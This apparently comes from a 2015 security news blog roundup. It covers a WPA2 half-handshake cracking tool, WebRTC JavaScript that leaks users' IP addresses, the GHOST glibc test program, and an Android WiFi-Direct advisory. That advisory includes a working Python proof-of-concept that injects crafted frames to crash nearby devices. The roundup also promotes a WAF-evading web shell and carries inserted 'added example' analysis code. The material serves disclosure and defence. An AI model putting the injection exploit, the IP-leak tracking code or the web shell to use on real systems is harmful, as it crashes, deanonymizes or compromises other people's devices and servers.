CVE Feeds

Jan 29, 2015

Tools: WPA2 HalfHandshake Crack

Conventional WPA2 attacks work by listening for a handshake between a client and an Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a proof of concept showing that it is not necessary to have the Access Point present: a person can simply listen for WPA2 probes from any client within range and then bring up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against it.

$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"


Source:: http://n0where.net/wpa2-halfhandshake-crack/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Reveal Real IP Of Firefox and Chrome

Firefox and Chrome have implemented WebRTC, which allows requests to STUN servers to be made that return the local and public IP addresses of the user. These request results are available to JavaScript, so you can now obtain a user's local and public IP addresses in JavaScript. This demo is an example implementation of that.
Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console and cannot be blocked by plugins such as AdBlock Plus or Ghostery. This makes these types of requests usable for online tracking if an advertiser sets up a STUN server with a wildcard domain.


//get the local and public IP addresses of the current browser
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
    if(window.webkitRTCPeerConnection)
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate){

            //match just the IP address (IPv4 only: IPv6 and hostname candidates yield no match)
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
            var ip_match = ip_regex.exec(ice.candidate.candidate);
            if(!ip_match) return;
            var ip_addr = ip_match[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)
                callback(ip_addr);

            ip_dups[ip_addr] = true;
        }
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){});

    }, function(){});
}

//Test: Print the IP addresses into the console
getIPs(function(ip){console.log(ip);});
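As an added example (not code from the page or from the webrtc-ips project), the following Python parser runs over constructed ICE candidate strings in the format that the onicecandidate handler above receives. It shows what each candidate type exposes (host candidates carry LAN addresses, srflx candidates carry the address the STUN server saw), that the snippet's IPv4-only regex finds nothing in an IPv6 candidate, and that current browsers publish host candidates as mDNS .local names instead of literal IPs, which is why this technique now reveals less than it did in 2015. The sample lines, addresses and function names are constructed assumptions.

```python
import re
from ipaddress import ip_address

# Constructed sample candidate strings (not captured from a real browser). Each is the
# value of RTCIceCandidate.candidate, in the form:
#   "candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ..."
SAMPLE_CANDIDATES = [
    "candidate:842163049 1 udp 2122260223 192.168.1.23 54321 typ host generation 0",
    "candidate:842163049 1 udp 2122260223 fe80::1c2f:9d3a:44b1:8f7e 54322 typ host generation 0",
    "candidate:1853887674 1 udp 1686052607 203.0.113.45 54321 typ srflx raddr 192.168.1.23 rport 54321 generation 0",
    "candidate:842163050 1 udp 2122260223 3c9a7f1e-5d2b-4e8f-9a0c-1b2c3d4e5f60.local 54323 typ host generation 0",
]

# The IPv4-only regex used by the JavaScript snippet.
PAGE_IPV4_RE = re.compile(r"([0-9]{1,3}(\.[0-9]{1,3}){3})")


def page_style_extract(candidate):
    """Mimic the snippet: first IPv4 literal in the candidate line, or None.
    The snippet indexes the match result without a null check, so every None
    here is a line on which the original code would throw in the browser."""
    m = PAGE_IPV4_RE.search(candidate)
    return m.group(1) if m else None


def parse_candidate(candidate):
    """Parse one candidate line into its security-relevant fields."""
    parts = candidate.split()
    if len(parts) < 8 or not parts[0].startswith("candidate:") or parts[6] != "typ":
        raise ValueError("not an ICE candidate line: %r" % candidate)
    address, port, cand_type = parts[4], int(parts[5]), parts[7]
    if address.endswith(".local"):
        family = "mdns"  # host IP hidden behind a per-origin mDNS name
    else:
        family = "ipv%d" % ip_address(address).version
    return {"address": address, "port": port, "type": cand_type, "family": family}


def summarize_exposure(candidates):
    """Group what a page's JavaScript learns from the candidates:
    'local'  = host candidates with a literal IP (LAN addresses),
    'public' = server-reflexive candidates (address seen by the STUN server),
    'hidden' = host candidates obfuscated as mDNS names (no address learned)."""
    result = {"local": [], "public": [], "hidden": 0}
    for line in candidates:
        c = parse_candidate(line)
        if c["family"] == "mdns":
            result["hidden"] += 1
        elif c["type"] == "host":
            result["local"].append(c["address"])
        elif c["type"] == "srflx":
            result["public"].append(c["address"])
    return result


if __name__ == "__main__":
    for line in SAMPLE_CANDIDATES:
        print(page_style_extract(line), parse_candidate(line))
    print(summarize_exposure(SAMPLE_CANDIDATES))
```

On a page with a privacy concern, the useful check is therefore not whether any IPv4 literal shows up but which candidate types a site can obtain at all; the srflx entry is the one that reveals the public address even when host candidates are obfuscated.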
 


Source:: https://github.com/diafygi/webrtc-ips




Tools: Hipara - HIPS with Yara

Host intrusion prevention with the power of Yara

Source:: https://github.com/jbc22/hipara



Videos: Shmoocon 2015 Videos: Playlist Version (January 2015)

Link:: https://archive.org/details/shmoocon-2015-videos-playlist


 



Tools: Hopper - Debug an Application and a Library at the Same Time

Hopper 3.7.3 is available. The most important feature of this release is the ability to debug multiple documents at once!
For instance, it is now possible to open a document with the main executable of an application and another document with a framework used by the application. When you set breakpoints in these two documents and launch the debugger, Hopper will do its best to show the correct document containing the current PC value.

Source:: http://hopperapp.com/blog/?p=136




Howto: Test for the GHOST Vulnerability (and related resources)

Check Vulnerability
1. Test with the code from Qualys (http://www.openwall.com/lists/oss-security/2015/01/27/9) or download it from http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c

# wget "http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c"

# gcc -o ghost GHOST.c
# ./ghost

###### Source code here
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}

###### End of Source code.
If it prints "vulnerable", your Linux system is affected by GHOST; if it prints "not vulnerable", your system is safe.

2. Check the glibc version
# ldd --version
On Debian/Ubuntu, you must have glibc > 2.18.

On CentOS/Red Hat Enterprise Linux, you must have glibc 2.12-1.149.
3. Check with PHP
# php -r '$e="0";for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);'
If it segfaults, you are vulnerable.

4. Check which applications use the glibc library
# lsof | grep libc | awk '{print $1}' | sort | uniq
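Added example (not part of the page or of the Qualys test program): a Python model of the buffer layout that the vulnerable __nss_hostname_digits_dots() carves out of the caller's buffer, which explains the magic numbers in GHOST.c above. The size check counts host_addr (16 bytes) and the two h_addr_ptrs pointers but omits the h_alias_ptr pointer, so a name of exactly sizeof(buffer) - 16 - 2*sizeof(char*) - 1 characters passes the check while the NUL-terminated copy of the name runs sizeof(char*) bytes past the buffer, which is what clobbers the canary. The pointer sizes 4 and 8 are assumptions for 32- and 64-bit builds; the function names are constructed.

```python
# Layout the vulnerable glibc code places in the caller's buffer, in order:
#   host_addr    struct in6_addr, 16 bytes
#   h_addr_ptrs  2 x char*
#   h_alias_ptr  1 x char*      <- not counted by the size check
#   hostname     strlen(name) + 1 bytes (the copied name and its NUL)
SIZEOF_IN6_ADDR = 16


def size_needed(name_len, ptr_size):
    """Size the vulnerable code compared against buflen (h_alias_ptr omitted)."""
    return SIZEOF_IN6_ADDR + 2 * ptr_size + name_len + 1


def size_written(name_len, ptr_size):
    """Bytes actually laid out in the buffer, including h_alias_ptr."""
    return SIZEOF_IN6_ADDR + 2 * ptr_size + ptr_size + name_len + 1


def outcome(name_len, buflen, ptr_size, fixed=False):
    """Result of gethostbyname_r() on a digits-only name of this length.
    fixed=True models the corrected check, which counts every field."""
    needed = size_written(name_len, ptr_size) if fixed else size_needed(name_len, ptr_size)
    if needed > buflen:
        return ("ERANGE", 0)  # rejected up front, nothing overflows
    spill = max(0, size_written(name_len, ptr_size) - buflen)
    return ("OK", spill)      # spill > 0: that many bytes land past the buffer


def ghost_test_name_len(buflen, ptr_size):
    """Name length chosen by GHOST.c: the largest that passes the buggy check."""
    return buflen - SIZEOF_IN6_ADDR - 2 * ptr_size - 1


if __name__ == "__main__":
    for ptr_size in (4, 8):
        n = ghost_test_name_len(1024, ptr_size)
        print("sizeof(char*)=%d name_len=%d vulnerable->%s fixed->%s" % (
            ptr_size, n, outcome(n, 1024, ptr_size), outcome(n, 1024, ptr_size, fixed=True)))
```

The two branches of GHOST.c map directly onto this: a spill overwrites the canary that sits right after the 1024-byte buffer ("vulnerable"), while a corrected glibc returns ERANGE for the same name ("not vulnerable").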

How to fix
1. Debian/Ubuntu
Fix with:
# apt-get update && apt-get upgrade && apt-get dist-upgrade

2. CentOS/Red Hat Enterprise Linux
Fix with:
# yum clean all && yum update

Source:: 
-    http://www.frsag.org/pipermail/frsag/2015-January/005722.html
-    https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability
-    http://www.beej.us/guide/bgnet/output/html/multipage/gethostbynameman.html
-    http://man7.org/linux/man-pages/man3/gethostbyname.3.html
-    http://lcamtuf.blogspot.co.uk/2015/01/technical-analysis-of-qualys-ghost.html
-    http://www.openwall.com/lists/oss-security/2015/01/27/9
-    http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/

Jan 27, 2015

Android WiFi-Direct Denial of Service


1. *Advisory Information*

Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release


2. *Vulnerability Information*

Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997


3. *Vulnerability Description*

   Some Android devices are affected by a Denial of Service attack when
   scanning for WiFi Direct devices.

   An attacker could send a specially crafted 802.11 Probe Response frame
   causing the Dalvik subsystem to reboot because of an unhandled exception
   in the WiFiMonitor class.


4. *Vulnerable Packages*

   . Nexus 5 - Android 4.4.4
   . Nexus 4 - Android 4.4.4
   . LG D806 - Android 4.2.2
   . Samsung SM-T310 - Android 4.2.2
   . Motorola RAZR HD - Android 4.1.2

   Other devices could be also affected.


5. *Non-vulnerable packages*

   . Android 5.0.1
   . Android 5.0.2


6. *Vendor Information, Solutions and Workarounds*

   Some mitigation actions may be to avoid using WiFi-Direct or update
   to a non-vulnerable Android version.
   Contact vendor for further information.

7. *Credits*

   This vulnerability was discovered and researched by Andres Blanco
   from the CoreLabs Team. The publication of this advisory was
   coordinated by the Core Advisories Team.


8. *Technical Description / Proof of Concept Code*


   Android makes use of a modified *wpa_supplicant*[1] in order to provide
   an interface between the wireless driver and the Android platform
   framework.

   Below is the function that handles *wpa_supplicant* events. This
   function returns a jstring from calling the NewStringUTF method.

/-----
    static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
    {
        char buf[EVENT_BUF_SIZE];
        int nread = ::wifi_wait_for_event(buf, sizeof buf);
        if (nread > 0) {
            return env->NewStringUTF(buf);
        } else {
        return NULL;
        }
    }
-----/

   The WiFi-Direct specification defines the P2P discovery procedure to
   enable P2P devices to exchange device information; the device name is
   part of this information.

   The WifiP2pDevice class, located at
   /wifi/java/android/net/wifi/p2p/WifiP2pDevice.java, represents a Wi-Fi
   p2p device. The constructor method receives the string provided by the
   *wpa_supplicant* and throws an IllegalArgumentException in case the
   event is malformed.

   Below is partial content of the WiFiP2PDevice.java file.

/-----
        [...]

        /** Detailed device string pattern with WFD info
         * Example:
         *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e
         *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188
         *  dev_capab=0x21 group_capab=0x9
         */
        private static final Pattern detailedDevicePattern = Pattern.compile(
            "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "(\\d+ )?" +
            "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
            "name='(.*)' " +
            "config_methods=(0x[0-9a-fA-F]+) " +
            "dev_capab=(0x[0-9a-fA-F]+) " +
            "group_capab=(0x[0-9a-fA-F]+)" +
            "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
        );

        [...]

        /**
         * @param string formats supported include
         *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13
         *  pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 dev_capab=0x27
         *  group_capab=0x0 wfd_dev_info=000006015d022a0032
         *
         *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
         *
         *  AP-STA-CONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
         *
         *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
         *
         *  fa:7b:7a:42:02:13
         *
         *  Note: The events formats can be looked up in the wpa_supplicant code
         * @hide
         */
        public WifiP2pDevice(String string) throws IllegalArgumentException {
            String[] tokens = string.split("[ \n]");
            Matcher match;

            if (tokens.length < 1) {
                throw new IllegalArgumentException("Malformed supplicant event");
            }

            switch (tokens.length) {
                case 1:
                    /* Just a device address */
                    deviceAddress = string;
                    return;
                case 2:
                    match = twoTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed supplicant event");
                    }
                    deviceAddress = match.group(2);
                    return;
                case 3:
                    match = threeTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed supplicant event");
                    }
                    deviceAddress = match.group(1);
                    return;
                default:
                    match = detailedDevicePattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed supplicant event");
                    }

                    deviceAddress = match.group(3);
                    primaryDeviceType = match.group(4);
                    deviceName = match.group(5);
                    wpsConfigMethodsSupported = parseHex(match.group(6));
                    deviceCapability = parseHex(match.group(7));
                    groupCapability = parseHex(match.group(8));
                    if (match.group(9) != null) {
                        String str = match.group(10);
                        wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)),
                                parseHex(str.substring(4,8)),
                                parseHex(str.substring(8,12)));
                    }
                    break;
            }

            if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
                status = AVAILABLE;
            }
        }

        [...]
-----/

   On some Android devices, processing a probe response frame with a
   WiFi-Direct (P2P) information element that contains a device name
   attribute with specific bytes generates a malformed supplicant event
   string that ends up throwing the IllegalArgumentException. As this
   exception is not handled, the Android system restarts.

   Below is partial content of the logcat of a Samsung SM-T310 running
   Android 4.2.2.

/-----
      I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0
      E/AndroidRuntime( 2129): ! () *** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor
      E/AndroidRuntime( 2129): java.lang.IllegalArgumentException: Malformed supplicant event
      E/AndroidRuntime( 2129):        at android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
      E/AndroidRuntime( 2129):        at android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
      E/AndroidRuntime( 2129):        at android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
      E/android.os.Debug( 2129): ! () Dumpstate > dumpstate -k -t -z -d -o /data/log/dumpstate_sys_error
-----/
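   Added example (not from the advisory or from Android): a Python transcription of the detailedDevicePattern and the constructor logic above, run against a well-formed event built from the javadoc example and a malformed one modelled on the logcat line. It shows the parse failing on the malformed string at exactly the point where the Java code throws, and a handler that logs and drops such an event instead of letting the exception escape, which is what a system-process thread fed by attacker-controlled frames needs. The event strings and function names are constructed assumptions; the two- and three-token patterns are not in the advisory excerpt and are not modelled.

```python
import re

# Python transcription of detailedDevicePattern from the WifiP2pDevice.java excerpt.
DETAILED_DEVICE_RE = re.compile(
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"(\d+ )?"
    r"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"pri_dev_type=(\d+-[0-9a-fA-F]+-\d+) "
    r"name='(.*)' "
    r"config_methods=(0x[0-9a-fA-F]+) "
    r"dev_capab=(0x[0-9a-fA-F]+) "
    r"group_capab=(0x[0-9a-fA-F]+)"
    r"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
)

# Constructed sample events. WELLFORMED_EVENT follows the javadoc example;
# MALFORMED_EVENT is modelled on the logcat line (non-MAC address, no name= key,
# "\xac" standing in for the stray bytes shown as '¬').
WELLFORMED_EVENT = ("P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13 "
                    "pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 "
                    "dev_capab=0x27 group_capab=0x0 wfd_dev_info=0x000006015d022a0032")
MALFORMED_EVENT = ("P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 "
                   " 'fa\xac\xac' config_methods=0x188 dev_capab=0x21 group_capab=0x0")


def parse_p2p_event(event):
    """Mirror WifiP2pDevice(String): return a dict of the parsed fields, or raise
    ValueError where the Java constructor throws IllegalArgumentException."""
    tokens = re.split(r"[ \n]", event)
    if len(tokens) < 1:
        raise ValueError("Malformed supplicant event")
    if len(tokens) == 1:
        return {"device_address": event}  # just a device address
    if len(tokens) in (2, 3):
        # twoTokenPattern / threeTokenPattern are not part of the advisory excerpt
        raise ValueError("short event forms not modelled here")
    m = DETAILED_DEVICE_RE.search(event)
    if not m:
        raise ValueError("Malformed supplicant event")  # the crash path in the logcat
    dev = {
        "device_address": m.group(3),
        "primary_device_type": m.group(4),
        "device_name": m.group(5),
        "wps_config_methods": int(m.group(6), 16),
        "device_capability": int(m.group(7), 16),
        "group_capability": int(m.group(8), 16),
        "wfd_info": None,
    }
    if m.group(9) is not None:
        s = m.group(10)
        dev["wfd_info"] = (int(s[0:4], 16), int(s[4:8], 16), int(s[8:12], 16))
    if tokens[0].startswith("P2P-DEVICE-FOUND"):
        dev["status"] = "AVAILABLE"
    return dev


def handle_event_safely(event):
    """What the event loop should do: a frame from an untrusted peer must never
    take down the system process, so a parse failure is logged and the event
    dropped rather than propagated as an uncaught exception."""
    try:
        return parse_p2p_event(event)
    except ValueError as exc:
        print("dropping event (%s): %r" % (exc, event))
        return None


if __name__ == "__main__":
    print(handle_event_safely(WELLFORMED_EVENT))
    print(handle_event_safely(MALFORMED_EVENT))
```

   The hardened handler is the minimal change; a fuller fix also bounds what the supplicant may hand over (the name='(.*)' group accepts any bytes, so the constructor's input validation is only as strong as the regex).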


8.1. *Proof of Concept*


   This PoC was implemented using the open source library Lorcon
   [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

/-----
    #!/usr/bin/env python

    import sys
    import time
    import struct
    import PyLorcon2


    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "\x50\x00"  # Frame Control
        frame += "\x00\x00"  # Duration
        frame += destination
        frame += source
        frame += source
        frame += "\x00\x00"  # Sequence Control
        frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
        frame += "\x64\x00"  # Beacon Interval
        frame += "\x30\x04"  # Capabilities Information

        # SSID IE
        frame += "\x00"
        frame += "\x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "\x01"
        frame += "\x08"
        frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

        # DS Parameter Set
        frame += "\x03"
        frame += "\x01"
        frame += struct.pack("B", channel)

        # P2P
        frame += "\xDD"
        frame += "\x27"
        frame += "\x50\x6F\x9A"
        frame += "\x09"
        # P2P Capabilities
        frame += "\x02" # ID
        frame += "\x02\x00" # Length
        frame += "\x21\x00"
        # P2P Device Info
        frame += "\x0D" # ID
        frame += "\x1B\x00" # Length
        frame += source
        frame += "\x01\x88"
        frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
        frame += "\x00"
        frame += "\x10\x11"
        frame += "\x00\x06"
        frame += "fafa\xFA\xFA"

        return frame


    def str_to_mac(address):
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py <iface> <target>"
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"
            sys.exit(-1)

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        context = PyLorcon2.Context(iface)
        context.open_injmon()

        channel = 1
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
            context.send_bytes(frame)
            time.sleep(0.100)
-----/ 
Source:: http://seclists.org/fulldisclosure/2015/Jan/104 



Jan 26, 2015

Tools: sshttp - hiding SSH servers behind HTTP

In case your firewall policy forbids SSH access to the DMZ or internal network from outside, but you still want to use SSH on machines that only have one open port, e.g. HTTP, you can use sshttpd.
sshttpd can multiplex the following protocol pairs:
  • SSH/HTTP
  • SSH/HTTPS
  • SSH/SMTP (without SMTP multiline banners)
Source:: https://github.com/stealth/sshttp



Tools: Advanced Web Shell

There are multiple things that make DAws better than every other Web Shell out there:
  1. Bypasses disablers: DAws isn't just about using a particular function to get the job done; it uses up to 6 functions if needed. For example, if shell_exec is disabled it automatically uses exec, passthru, system, popen or proc_open instead. The same goes for downloading a file from a link: if curl is disabled then file_get_contents is used instead. This feature is widely used in every section and function of the shell.
  2. Automatic random encoding: DAws automatically and randomly encodes most of your GET and POST data using JavaScript or PHP, which will allow your shell to bypass pretty much every WAF out there.
  3. Advanced file manager: DAws's file manager contains everything a file manager needs and even more, but the main feature is that everything is dynamically printed; the permissions of every file and folder are checked, and the functions that can be used are made available based on these permissions. This saves time and makes life much easier.
  4. Tools: DAws holds a bunch of useful tools such as "bpscan", which can identify usable and unblocked ports on the server within a few minutes, which can later on allow you to go for a bind shell, for example.
  5. Everything that can't be used at all is simply removed so users do not have to waste their time. For example, the execution of C++ scripts when there are no C++ compilers on the server (DAws would have checked for multiple compilers in the first place): in this case the function is automatically removed and the user is told.
  6. Supports Windows and Linux.
  7. Open source.
Source:: https://github.com/dotcppfile/DAws



Tools: malwaRE- Malware repository framework

Malware comes in many behaviours, and many security research teams deploy distributed honeypots to detect new malware. The honeypots emulate vulnerable services that attract malware and help to catch new binaries. If you are in the malware research field you can take a look at the malwaRE project.
malwaRE is a malware repository that helps researchers store their samples for further analysis or keep track of old samples that will be needed in the future. Some of the features are:
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal’s score column)
  • Download samples from repository
Source:: http://www.sectechno.com/malware-malware-repository-framework/

